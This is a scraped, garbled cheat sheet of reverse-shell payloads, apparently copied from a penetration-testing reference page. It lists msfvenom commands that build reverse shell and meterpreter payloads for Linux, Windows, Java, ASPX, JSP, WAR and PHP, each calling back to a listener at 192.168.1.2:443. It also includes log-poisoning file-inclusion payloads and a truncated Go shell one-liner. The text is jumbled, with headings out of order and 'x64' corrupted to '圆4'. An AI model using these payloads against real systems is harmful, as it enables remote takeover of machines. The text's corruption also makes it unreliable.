This can be caught with metasploit multi-handler. A non-staged shell is sent over in one block. There is an important difference between non-staged and staged payload. Many of the ones listed below comes from this cheat-sheet: This is s great collection of different types of reverse shells and webshells.
NETCAT REVERSE SHELL LISTENER HOW TO
X64 - Shell msfvenom -p linux/圆4/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.Common ports\/services and how to use themīroken Authentication or Session Managementĭefault Layout of Apache on Different Versions X86 - Shell msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf X64 - Meterpreter msfvenom -p linux/圆4/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf X86 - Meterpreter msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf X64 - Shell msfvenom -p linux/圆4/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf Linux Listener Metasploit Multi Handler X86 - Shell msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf X64 - Shell msfvenom -p windows/圆4/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe Linux Payloads X86 - Shell msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe X64 - Meterpreter msfvenom -p windows/圆4/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe X86 - Meterpreter msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe
NETCAT REVERSE SHELL LISTENER WINDOWS
X64 - Shell msfvenom -p windows/圆4/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe Windows Listener Metasploit Multi Handler X86 - Shell msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe Msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx Windows Payloads Msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.jsp ASPX Payload Msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f jar > reverse.jar JSP Payload
![netcat reverse shell listener netcat reverse shell listener](https://i.stack.imgur.com/Qjal8.png)
Msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f war > reverse.war JAR Payload
![netcat reverse shell listener netcat reverse shell listener](http://2.bp.blogspot.com/-FogB0vU_fBk/VVCPu6nklGI/AAAAAAAABPc/tOIv9EkM7Ig/w1200-h630-p-k-no-nu/Reverse_Linux.png)
Web Payloads PHP Payload msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php War Payload ' > /tmp/t.go & go run /tmp/t.go & rm /tmp/t.go Telnet
![netcat reverse shell listener netcat reverse shell listener](https://imaginoatt.com/txvg/Sc4ot5hiSxy8RyIcwM5AMAHaEe.jpg)
var/log/apache2/access.log /var/log/nginx/access.log curl -s -H "User-Agent: " "" User-Agent: /var/log/apache2/access.log&cmd=id /var/log/nginx/access.log&cmd=id Server Side Template Injection
![netcat reverse shell listener netcat reverse shell listener](https://images.viblo.asia/af4c2ff9-eeea-47eb-9a40-302f088380ce.png)
Log Poisoning SSH /var/log/auth.log ssh /var/log/auth.log&cmd=id Log Poisoning FTPįtp> /var/log/vsftpd.log&cmd=id Log Poisoning HTTP